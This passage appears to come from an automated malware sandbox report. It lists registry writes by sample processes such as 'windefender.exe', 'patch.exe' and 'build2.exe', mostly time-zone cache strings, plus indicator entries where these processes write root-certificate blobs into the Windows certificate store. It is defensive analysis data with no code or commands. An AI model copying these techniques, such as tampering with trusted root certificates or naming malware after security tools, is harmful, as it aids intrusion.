Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-22 = "Cape Verde Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a build2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 build2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a build2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
